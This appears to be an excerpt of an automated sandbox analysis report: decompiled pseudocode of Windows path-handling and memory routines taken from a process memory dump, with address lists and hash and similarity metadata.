                                                    														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                    														_t427 = 0;
                                                    														__eflags = 0;
                                                    														_t511 = 0x18;
                                                    														goto L91;
                                                    													} else {
                                                    														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                    														__eflags = _t519;
                                                    														 *(_t528 - 0x8c) = _t328;
                                                    														do {
                                                    															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                    															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                    															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                    															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                    															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                    															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                    																_t334 =  *_t519;
                                                    															} else {
                                                    																_t334 = 0;
                                                    															}
                                                    															_t336 = _t334 & 0x000000ff;
                                                    															__eflags = _t336;
                                                    															_t427 =  *(_t528 - 0x88);
                                                    															if(_t336 == 0) {
                                                    																_t481 = _t479 + _t506;
                                                    																__eflags = _t481;
                                                    																 *(_t528 - 0x78) = _t481;
                                                    																E04B8F3E0(_t479 + _t427, _t457, _t506);
                                                    																_t529 = _t529 + 0xc;
                                                    															} else {
                                                    																_t340 = _t336 - 1;
                                                    																__eflags = _t340;
                                                    																if(_t340 == 0) {
                                                    																	E04B8F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                    																	_t529 = _t529 + 0xc;
                                                    																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                    																} else {
                                                    																	__eflags = _t340 == 0;
                                                    																	if(_t340 == 0) {
                                                    																		__eflags = _t506 - 8;
                                                    																		if(_t506 == 8) {
                                                    																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                    																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                    																		}
                                                    																	}
                                                    																}
                                                    															}
                                                    															_t339 = 0x10;
                                                    															_t519 = _t519 + _t339;
                                                    															_t263 = _t528 - 0x8c;
                                                    															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                    															__eflags =  *_t263;
                                                    															_t479 =  *(_t528 - 0x78);
                                                    														} while ( *_t263 != 0);
                                                    														goto L87;
                                                    													}
                                                    												}
                                                    											} else {
                                                    												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                    												 *(_t528 - 0xa2) = _t392;
                                                    												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                    												__eflags = _t469;
                                                    												while(1) {
                                                    													 *(_t528 - 0xe4) = _t511;
                                                    													__eflags = _t392;
                                                    													_t393 = _t427;
                                                    													if(_t392 != 0) {
                                                    														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                    													}
                                                    													_t395 = (_t393 & 0x000000ff) - _t427;
                                                    													__eflags = _t395;
                                                    													if(_t395 == 0) {
                                                    														_t511 = _t511 +  *_t469;
                                                    														__eflags = _t511;
                                                    													} else {
                                                    														_t398 = _t395 - 1;
                                                    														__eflags = _t398;
                                                    														if(_t398 == 0) {
                                                    															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                    															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                    														} else {
                                                    															__eflags = _t398 == 1;
                                                    															if(_t398 == 1) {
                                                    																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                    																_t402 =  *_t469 & 0x0000ffff;
                                                    																 *(_t528 - 0xac) = _t402;
                                                    																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                    															}
                                                    														}
                                                    													}
                                                    													__eflags = _t511 -  *(_t528 - 0xe4);
                                                    													if(_t511 <  *(_t528 - 0xe4)) {
                                                    														break;
                                                    													}
                                                    													_t397 =  *(_t528 - 0x88) + 1;
                                                    													 *(_t528 - 0x88) = _t397;
                                                    													_t469 = _t469 + 0x10;
                                                    													__eflags = _t397 -  *(_t528 + 0x1c);
                                                    													_t392 =  *(_t528 - 0xa2);
                                                    													if(_t397 <  *(_t528 + 0x1c)) {
                                                    														continue;
                                                    													}
                                                    													goto L45;
                                                    												}
                                                    												_t475 = 0x216;
                                                    												 *(_t528 - 0x74) = 0x216;
                                                    												goto L45;
                                                    											}
                                                    										} else {
                                                    											asm("lock dec dword [eax+ecx*8+0x4]");
                                                    											goto L16;
                                                    										}
                                                    									}
                                                    									_t491 = E04C14CAB(_t306, _t528 - 0xa4);
                                                    									 *(_t528 - 0x74) = _t491;
                                                    									__eflags = _t491;
                                                    									if(_t491 != 0) {
                                                    										goto L91;
                                                    									} else {
                                                    										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                    										goto L20;
                                                    									}
                                                    								}
                                                    								L16:
                                                    								 *(_t528 - 0x74) = 0x1069;
                                                    								L93:
                                                    								_t298 =  *(_t528 - 0xd0) + 1;
                                                    								 *(_t528 - 0xd0) = _t298;
                                                    								_t474 = _t474 + _t511;
                                                    								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                    								_t494 = 4;
                                                    								__eflags = _t298 - _t494;
                                                    								if(_t298 >= _t494) {
                                                    									goto L100;
                                                    								}
                                                    								_t494 =  *(_t528 - 0xcc);
                                                    								_t435 = _t298;
                                                    								continue;
                                                    							}
                                                    							__eflags = _t494[2] | _t494[3];
                                                    							if((_t494[2] | _t494[3]) == 0) {
                                                    								goto L15;
                                                    							}
                                                    							goto L12;
                                                    						}
                                                    						__eflags = _t301;
                                                    						if(_t301 != 0) {
                                                    							goto L92;
                                                    						}
                                                    						goto L10;
                                                    						L92:
                                                    						goto L93;
                                                    					}
                                                    				} else {
                                                    					_push(0x57);
                                                    					L101:
                                                    					return E04B9D130(_t427, _t494, _t511);
                                                    				}
                                                    			}










































































                                                    0x04c15ecb
                                                    0x04c15ecb
                                                    0x04c15ece
                                                    0x04c15ece
                                                    0x04c15ed4
                                                    0x04c15ed7
                                                    0x04c15ed9
                                                    0x04c15edb
                                                    0x04c15edb
                                                    0x04c15ee1
                                                    0x04c15ee1
                                                    0x04c15ee3
                                                    0x04c15f20
                                                    0x04c15f20
                                                    0x04c15ee5
                                                    0x04c15ee5
                                                    0x04c15ee5
                                                    0x04c15ee8
                                                    0x04c15f11
                                                    0x04c15f18
                                                    0x04c15eea
                                                    0x04c15eea
                                                    0x04c15eed
                                                    0x04c15ef2
                                                    0x04c15ef8
                                                    0x04c15efb
                                                    0x04c15f0a
                                                    0x04c15f0a
                                                    0x04c15eed
                                                    0x04c15ee8
                                                    0x04c15f22
                                                    0x04c15f28
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15f30
                                                    0x04c15f31
                                                    0x04c15f37
                                                    0x04c15f3a
                                                    0x04c15f3d
                                                    0x04c15f44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15f46
                                                    0x04c15f48
                                                    0x04c15f4d
                                                    0x00000000
                                                    0x04c15f4d
                                                    0x04c15dda
                                                    0x04c15ddf
                                                    0x00000000
                                                    0x04c15ddf
                                                    0x04c15dd8
                                                    0x04c15da7
                                                    0x04c15da9
                                                    0x04c15dac
                                                    0x04c15dae
                                                    0x00000000
                                                    0x04c15db4
                                                    0x04c15db4
                                                    0x00000000
                                                    0x04c15db4
                                                    0x04c15dae
                                                    0x04c15d88
                                                    0x04c15d8d
                                                    0x04c16363
                                                    0x04c16369
                                                    0x04c1636a
                                                    0x04c16370
                                                    0x04c16372
                                                    0x04c1637a
                                                    0x04c1637b
                                                    0x04c1637d
                                                    0x00000000
                                                    0x00000000
                                                    0x04c1637f
                                                    0x04c16385
                                                    0x00000000
                                                    0x04c16385
                                                    0x04c15d38
                                                    0x04c15d3b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04c15d3b
                                                    0x04c15d27
                                                    0x04c15d29
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04c16360
                                                    0x00000000
                                                    0x04c16360
                                                    0x04c15c10
                                                    0x04c15c10
                                                    0x04c163da
                                                    0x04c163e5
                                                    0x04c163e5

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78a77268549f7312b1ac63692e1bba688d16e9755ec44510daabb09c07e2736b
                                                    • Instruction ID: 77c4c055943056948683dd35bf31570d54b7075c8fbdd870c03c9b149b666240
                                                    • Opcode Fuzzy Hash: 78a77268549f7312b1ac63692e1bba688d16e9755ec44510daabb09c07e2736b
                                                    • Instruction Fuzzy Hash: 95424E75E00219DFDB24CF68C880BA9B7B2FF46304F1581AAD84DEB251D774AA85DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 92%
                                                    			E04B64120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                    				signed int _v8;
                                                    				void* _v20;
                                                    				signed int _v24;
                                                    				char _v532;
                                                    				char _v540;
                                                    				signed short _v544;
                                                    				signed int _v548;
                                                    				signed short* _v552;
                                                    				signed short _v556;
                                                    				signed short* _v560;
                                                    				signed short* _v564;
                                                    				signed short* _v568;
                                                    				void* _v570;
                                                    				signed short* _v572;
                                                    				signed short _v576;
                                                    				signed int _v580;
                                                    				char _v581;
                                                    				void* _v584;
                                                    				unsigned int _v588;
                                                    				signed short* _v592;
                                                    				void* _v597;
                                                    				void* _v600;
                                                    				void* _v604;
                                                    				void* _v609;
                                                    				void* _v616;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				unsigned int _t161;
                                                    				signed int _t162;
                                                    				unsigned int _t163;
                                                    				void* _t169;
                                                    				signed short _t173;
                                                    				signed short _t177;
                                                    				signed short _t181;
                                                    				unsigned int _t182;
                                                    				signed int _t185;
                                                    				signed int _t213;
                                                    				signed int _t225;
                                                    				short _t233;
                                                    				signed char _t234;
                                                    				signed int _t242;
                                                    				signed int _t243;
                                                    				signed int _t244;
                                                    				signed int _t245;
                                                    				signed int _t250;
                                                    				void* _t251;
                                                    				signed short* _t254;
                                                    				void* _t255;
                                                    				signed int _t256;
                                                    				void* _t257;
                                                    				signed short* _t260;
                                                    				signed short _t265;
                                                    				signed short* _t269;
                                                    				signed short _t271;
                                                    				signed short** _t272;
                                                    				signed short* _t275;
                                                    				signed short _t282;
                                                    				signed short _t283;
                                                    				signed short _t290;
                                                    				signed short _t299;
                                                    				signed short _t307;
                                                    				signed int _t308;
                                                    				signed short _t311;
                                                    				signed short* _t315;
                                                    				signed short _t316;
                                                    				void* _t317;
                                                    				void* _t319;
                                                    				signed short* _t321;
                                                    				void* _t322;
                                                    				void* _t323;
                                                    				unsigned int _t324;
                                                    				signed int _t325;
                                                    				void* _t326;
                                                    				signed int _t327;
                                                    				signed int _t329;
                                                    
                                                    				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                    				_v8 =  *0x4c3d360 ^ _t329;
                                                    				_t157 = _a8;
                                                    				_t321 = _a4;
                                                    				_t315 = __edx;
                                                    				_v548 = __ecx;
                                                    				_t305 = _a20;
                                                    				_v560 = _a12;
                                                    				_t260 = _a16;
                                                    				_v564 = __edx;
                                                    				_v580 = _a8;
                                                    				_v572 = _t260;
                                                    				_v544 = _a20;
                                                    				if( *__edx <= 8) {
                                                    					L3:
                                                    					if(_t260 != 0) {
                                                    						 *_t260 = 0;
                                                    					}
                                                    					_t254 =  &_v532;
                                                    					_v588 = 0x208;
                                                    					if((_v548 & 0x00000001) != 0) {
                                                    						_v556 =  *_t315;
                                                    						_v552 = _t315[2];
                                                    						_t161 = E04B7F232( &_v556);
                                                    						_t316 = _v556;
                                                    						_v540 = _t161;
                                                    						goto L17;
                                                    					} else {
                                                    						_t306 = 0x208;
                                                    						_t298 = _t315;
                                                    						_t316 = E04B66E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                    						if(_t316 == 0) {
                                                    							L68:
                                                    							_t322 = 0xc0000033;
                                                    							goto L39;
                                                    						} else {
                                                    							while(_v581 == 0) {
                                                    								_t233 = _v588;
                                                    								if(_t316 > _t233) {
                                                    									_t234 = _v548;
                                                    									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                    										_t254 = L04B64620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                    										if(_t254 == 0) {
                                                    											_t169 = 0xc0000017;
                                                    										} else {
                                                    											_t298 = _v564;
                                                    											_v588 = _t316;
                                                    											_t306 = _t316;
                                                    											_t316 = E04B66E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                    											if(_t316 != 0) {
                                                    												continue;
                                                    											} else {
                                                    												goto L68;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										goto L90;
                                                    									}
                                                    								} else {
                                                    									_v556 = _t316;
                                                    									 *((short*)(_t329 + 0x32)) = _t233;
                                                    									_v552 = _t254;
                                                    									if(_t316 < 2) {
                                                    										L11:
                                                    										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                    											_t161 = 5;
                                                    										} else {
                                                    											if(_t316 < 6) {
                                                    												L87:
                                                    												_t161 = 3;
                                                    											} else {
                                                    												_t242 = _t254[2] & 0x0000ffff;
                                                    												if(_t242 != 0x5c) {
                                                    													if(_t242 == 0x2f) {
                                                    														goto L16;
                                                    													} else {
                                                    														goto L87;
                                                    													}
                                                    													goto L101;
                                                    												} else {
                                                    													L16:
                                                    													_t161 = 2;
                                                    												}
                                                    											}
                                                    										}
                                                    									} else {
                                                    										_t243 =  *_t254 & 0x0000ffff;
                                                    										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                    											if(_t316 < 4) {
                                                    												L81:
                                                    												_t161 = 4;
                                                    												goto L17;
                                                    											} else {
                                                    												_t244 = _t254[1] & 0x0000ffff;
                                                    												if(_t244 != 0x5c) {
                                                    													if(_t244 == 0x2f) {
                                                    														goto L60;
                                                    													} else {
                                                    														goto L81;
                                                    													}
                                                    												} else {
                                                    													L60:
                                                    													if(_t316 < 6) {
                                                    														L83:
                                                    														_t161 = 1;
                                                    														goto L17;
                                                    													} else {
                                                    														_t245 = _t254[2] & 0x0000ffff;
                                                    														if(_t245 != 0x2e) {
                                                    															if(_t245 == 0x3f) {
                                                    																goto L62;
                                                    															} else {
                                                    																goto L83;
                                                    															}
                                                    														} else {
                                                    															L62:
                                                    															if(_t316 < 8) {
                                                    																L85:
                                                    																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                    																goto L17;
                                                    															} else {
                                                    																_t250 = _t254[3] & 0x0000ffff;
                                                    																if(_t250 != 0x5c) {
                                                    																	if(_t250 == 0x2f) {
                                                    																		goto L64;
                                                    																	} else {
                                                    																		goto L85;
                                                    																	}
                                                    																} else {
                                                    																	L64:
                                                    																	_t161 = 6;
                                                    																	goto L17;
                                                    																}
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    											goto L101;
                                                    										} else {
                                                    											goto L11;
                                                    										}
                                                    									}
                                                    									L17:
                                                    									if(_t161 != 2) {
                                                    										_t162 = _t161 - 1;
                                                    										if(_t162 > 5) {
                                                    											goto L18;
                                                    										} else {
                                                    											switch( *((intOrPtr*)(_t162 * 4 +  &M04B645F8))) {
                                                    												case 0:
                                                    													_v568 = 0x4b21078;
                                                    													__eax = 2;
                                                    													goto L20;
                                                    												case 1:
                                                    													goto L18;
                                                    												case 2:
                                                    													_t163 = 4;
                                                    													goto L19;
                                                    											}
                                                    										}
                                                    										goto L41;
                                                    									} else {
                                                    										L18:
                                                    										_t163 = 0;
                                                    										L19:
                                                    										_v568 = 0x4b211c4;
                                                    									}
                                                    									L20:
                                                    									_v588 = _t163;
                                                    									_v564 = _t163 + _t163;
                                                    									_t306 =  *_v568 & 0x0000ffff;
                                                    									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                    									_v576 = _t265;
                                                    									if(_t265 > 0xfffe) {
                                                    										L90:
                                                    										_t322 = 0xc0000106;
                                                    									} else {
                                                    										if(_t321 != 0) {
                                                    											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                    												if(_v580 != 0) {
                                                    													goto L23;
                                                    												} else {
                                                    													_t322 = 0xc0000106;
                                                    													goto L39;
                                                    												}
                                                    											} else {
                                                    												_t177 = _t306;
                                                    												goto L25;
                                                    											}
                                                    											goto L101;
                                                    										} else {
                                                    											if(_v580 == _t321) {
                                                    												_t322 = 0xc000000d;
                                                    											} else {
                                                    												L23:
                                                    												_t173 = L04B64620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                    												_t269 = _v592;
                                                    												_t269[2] = _t173;
                                                    												if(_t173 == 0) {
                                                    													_t322 = 0xc0000017;
                                                    												} else {
                                                    													_t316 = _v556;
                                                    													 *_t269 = 0;
                                                    													_t321 = _t269;
                                                    													_t269[1] = _v576;
                                                    													_t177 =  *_v568 & 0x0000ffff;
                                                    													L25:
                                                    													_v580 = _t177;
                                                    													if(_t177 == 0) {
                                                    														L29:
                                                    														_t307 =  *_t321 & 0x0000ffff;
                                                    													} else {
                                                    														_t290 =  *_t321 & 0x0000ffff;
                                                    														_v576 = _t290;
                                                    														_t310 = _t177 & 0x0000ffff;
                                                    														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                    															_t307 =  *_t321 & 0xffff;
                                                    														} else {
                                                    															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                    															E04B8F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                    															_t329 = _t329 + 0xc;
                                                    															_t311 = _v580;
                                                    															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                    															 *_t321 = _t225;
                                                    															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                    																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                    															}
                                                    															goto L29;
                                                    														}
                                                    													}
                                                    													_t271 = _v556 - _v588 + _v588;
                                                    													_v580 = _t307;
                                                    													_v576 = _t271;
                                                    													if(_t271 != 0) {
                                                    														_t308 = _t271 & 0x0000ffff;
                                                    														_v588 = _t308;
                                                    														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                    															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                    															E04B8F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                    															_t329 = _t329 + 0xc;
                                                    															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                    															 *_t321 = _t213;
                                                    															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                    																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                    															}
                                                    														}
                                                    													}
                                                    													_t272 = _v560;
                                                    													if(_t272 != 0) {
                                                    														 *_t272 = _t321;
                                                    													}
                                                    													_t306 = 0;
                                                    													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                    													_t275 = _v572;
                                                    													if(_t275 != 0) {
                                                    														_t306 =  *_t275;
                                                    														if(_t306 != 0) {
                                                    															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                    														}
                                                    													}
                                                    													_t181 = _v544;
                                                    													if(_t181 != 0) {
                                                    														 *_t181 = 0;
                                                    														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                    														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                    														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                    														if(_v540 == 5) {
                                                    															_t182 = E04B452A5(1);
                                                    															_v588 = _t182;
                                                    															if(_t182 == 0) {
                                                    																E04B5EB70(1, 0x4c379a0);
                                                    																goto L38;
                                                    															} else {
                                                    																_v560 = _t182 + 0xc;
                                                    																_t185 = E04B5AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                    																if(_t185 == 0) {
                                                    																	_t324 = _v588;
                                                    																	goto L97;
                                                    																} else {
                                                    																	_t306 = _v544;
                                                    																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                    																	 *(_t306 + 4) = _t282;
                                                    																	_v576 = _t282;
                                                    																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                    																	 *_t306 = _t325;
                                                    																	if( *_t282 == 0x5c) {
                                                    																		_t149 = _t325 - 2; // -2
                                                    																		_t283 = _t149;
                                                    																		 *_t306 = _t283;
                                                    																		 *(_t306 + 4) = _v576 + 2;
                                                    																		_t185 = _t283 & 0x0000ffff;
                                                    																	}
                                                    																	_t324 = _v588;
                                                    																	 *(_t306 + 2) = _t185;
                                                    																	if((_v548 & 0x00000002) == 0) {
                                                    																		L97:
                                                    																		asm("lock xadd [esi], eax");
                                                    																		if((_t185 | 0xffffffff) == 0) {
                                                    																			_push( *((intOrPtr*)(_t324 + 4)));
                                                    																			E04B895D0();
                                                    																			L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                    																		}
                                                    																	} else {
                                                    																		 *(_t306 + 0xc) = _t324;
                                                    																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                    																	}
                                                    																	goto L38;
                                                    																}
                                                    															}
                                                    															goto L41;
                                                    														}
                                                    													}
                                                    													L38:
                                                    													_t322 = 0;
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    									L39:
                                                    									if(_t254 !=  &_v532) {
                                                    										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                    									}
                                                    									_t169 = _t322;
                                                    								}
                                                    								goto L41;
                                                    							}
                                                    							goto L68;
                                                    						}
                                                    					}
                                                    					L41:
                                                    					_pop(_t317);
                                                    					_pop(_t323);
                                                    					_pop(_t255);
                                                    					return E04B8B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                    				} else {
                                                    					_t299 = __edx[2];
                                                    					if( *_t299 == 0x5c) {
                                                    						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                    						if(_t256 != 0x5c) {
                                                    							if(_t256 != 0x3f) {
                                                    								goto L2;
                                                    							} else {
                                                    								goto L50;
                                                    							}
                                                    						} else {
                                                    							L50:
                                                    							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                    								goto L2;
                                                    							} else {
                                                    								_t251 = E04B83D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                    								_pop(_t319);
                                                    								_pop(_t326);
                                                    								_pop(_t257);
                                                    								return E04B8B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						L2:
                                                    						_t260 = _v572;
                                                    						goto L3;
                                                    					}
                                                    				}
                                                    				L101:
                                                    			}

                                                    0x04b64429
                                                    0x04b6416e
                                                    0x04b6416e
                                                    0x04b64175
                                                    0x04b64498
                                                    0x04b6449f
                                                    0x04bae12d
                                                    0x00000000
                                                    0x04bae133
                                                    0x00000000
                                                    0x04bae133
                                                    0x04b644a5
                                                    0x04b644a5
                                                    0x04b644aa
                                                    0x00000000
                                                    0x04b644bb
                                                    0x04b644ca
                                                    0x04b644d6
                                                    0x04b644d7
                                                    0x04b644d8
                                                    0x04b644e3
                                                    0x04b644e3
                                                    0x04b644aa
                                                    0x04b6417b
                                                    0x04b6417b
                                                    0x04b6417b
                                                    0x00000000
                                                    0x04b6417b
                                                    0x04b64175
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b50420d59a4e0638d4ff9491b6be1615557a4e110a31d15490d9d86b77ad201
                                                    • Instruction ID: 0404a20ae55493d4adff61c31bc0b32aa024c10d206b3c679c2146877872aa74
                                                    • Opcode Fuzzy Hash: 9b50420d59a4e0638d4ff9491b6be1615557a4e110a31d15490d9d86b77ad201
                                                    • Instruction Fuzzy Hash: 95F182706087118FDB24DF19C480A3AB7E1FF88718F1449AEF886CB250E738E995DB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 92%
                                                    			E04B720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed char _v24;
                                                    				intOrPtr _v28;
                                                    				signed int _v32;
                                                    				void* _v36;
                                                    				char _v48;
                                                    				signed int _v52;
                                                    				signed int _v56;
                                                    				unsigned int _v60;
                                                    				char _v64;
                                                    				unsigned int _v68;
                                                    				signed int _v72;
                                                    				char _v73;
                                                    				signed int _v74;
                                                    				char _v75;
                                                    				signed int _v76;
                                                    				void* _v81;
                                                    				void* _v82;
                                                    				void* _v89;
                                                    				void* _v92;
                                                    				void* _v97;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed char _t128;
                                                    				void* _t129;
                                                    				signed int _t130;
                                                    				void* _t132;
                                                    				signed char _t133;
                                                    				intOrPtr _t135;
                                                    				signed int _t137;
                                                    				signed int _t140;
                                                    				signed int* _t144;
                                                    				signed int* _t145;
                                                    				intOrPtr _t146;
                                                    				signed int _t147;
                                                    				signed char* _t148;
                                                    				signed int _t149;
                                                    				signed int _t153;
                                                    				signed int _t169;
                                                    				signed int _t174;
                                                    				signed int _t180;
                                                    				void* _t197;
                                                    				void* _t198;
                                                    				signed int _t201;
                                                    				intOrPtr* _t202;
                                                    				intOrPtr* _t205;
                                                    				signed int _t210;
                                                    				signed int _t215;
                                                    				signed int _t218;
                                                    				signed char _t221;
                                                    				signed int _t226;
                                                    				char _t227;
                                                    				signed int _t228;
                                                    				void* _t229;
                                                    				unsigned int _t231;
                                                    				void* _t235;
                                                    				signed int _t240;
                                                    				signed int _t241;
                                                    				void* _t242;
                                                    				signed int _t246;
                                                    				signed int _t248;
                                                    				signed int _t252;
                                                    				signed int _t253;
                                                    				void* _t254;
                                                    				intOrPtr* _t256;
                                                    				intOrPtr _t257;
                                                    				unsigned int _t262;
                                                    				signed int _t265;
                                                    				void* _t267;
                                                    				signed int _t275;
                                                    
                                                    				_t198 = __ebx;
                                                    				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                    				_v68 = __ecx;
                                                    				_v73 = 0;
                                                    				_t201 = __edx & 0x00002000;
                                                    				_t128 = __edx & 0xffffdfff;
                                                    				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                    				_v72 = _t128;
                                                    				if((_t128 & 0x00000008) != 0) {
                                                    					__eflags = _t128 - 8;
                                                    					if(_t128 != 8) {
                                                    						L69:
                                                    						_t129 = 0xc000000d;
                                                    						goto L23;
                                                    					} else {
                                                    						_t130 = 0;
                                                    						_v72 = 0;
                                                    						_v75 = 1;
                                                    						L2:
                                                    						_v74 = 1;
                                                    						_t226 =  *0x4c38714; // 0x0
                                                    						if(_t226 != 0) {
                                                    							__eflags = _t201;
                                                    							if(_t201 != 0) {
                                                    								L62:
                                                    								_v74 = 1;
                                                    								L63:
                                                    								_t130 = _t226 & 0xffffdfff;
                                                    								_v72 = _t130;
                                                    								goto L3;
                                                    							}
                                                    							_v74 = _t201;
                                                    							__eflags = _t226 & 0x00002000;
                                                    							if((_t226 & 0x00002000) == 0) {
                                                    								goto L63;
                                                    							}
                                                    							goto L62;
                                                    						}
                                                    						L3:
                                                    						_t227 = _v75;
                                                    						L4:
                                                    						_t240 = 0;
                                                    						_v56 = 0;
                                                    						_t252 = _t130 & 0x00000100;
                                                    						if(_t252 != 0 || _t227 != 0) {
                                                    							_t240 = _v68;
                                                    							_t132 = E04B72EB0(_t240);
                                                    							__eflags = _t132 - 2;
                                                    							if(_t132 != 2) {
                                                    								__eflags = _t132 - 1;
                                                    								if(_t132 == 1) {
                                                    									goto L25;
                                                    								}
                                                    								__eflags = _t132 - 6;
                                                    								if(_t132 == 6) {
                                                    									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                    									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                    										goto L40;
                                                    									}
                                                    									_t197 = E04B72EB0(_t240 + 8);
                                                    									__eflags = _t197 - 2;
                                                    									if(_t197 == 2) {
                                                    										goto L25;
                                                    									}
                                                    								}
                                                    								L40:
                                                    								_t133 = 1;
                                                    								L26:
                                                    								_t228 = _v75;
                                                    								_v56 = _t240;
                                                    								__eflags = _t133;
                                                    								if(_t133 != 0) {
                                                    									__eflags = _t228;
                                                    									if(_t228 == 0) {
                                                    										L43:
                                                    										__eflags = _v72;
                                                    										if(_v72 == 0) {
                                                    											goto L8;
                                                    										}
                                                    										goto L69;
                                                    									}
                                                    									_t133 = E04B458EC(_t240);
                                                    									_t221 =  *0x4c35cac; // 0x16
                                                    									__eflags = _t221 & 0x00000040;
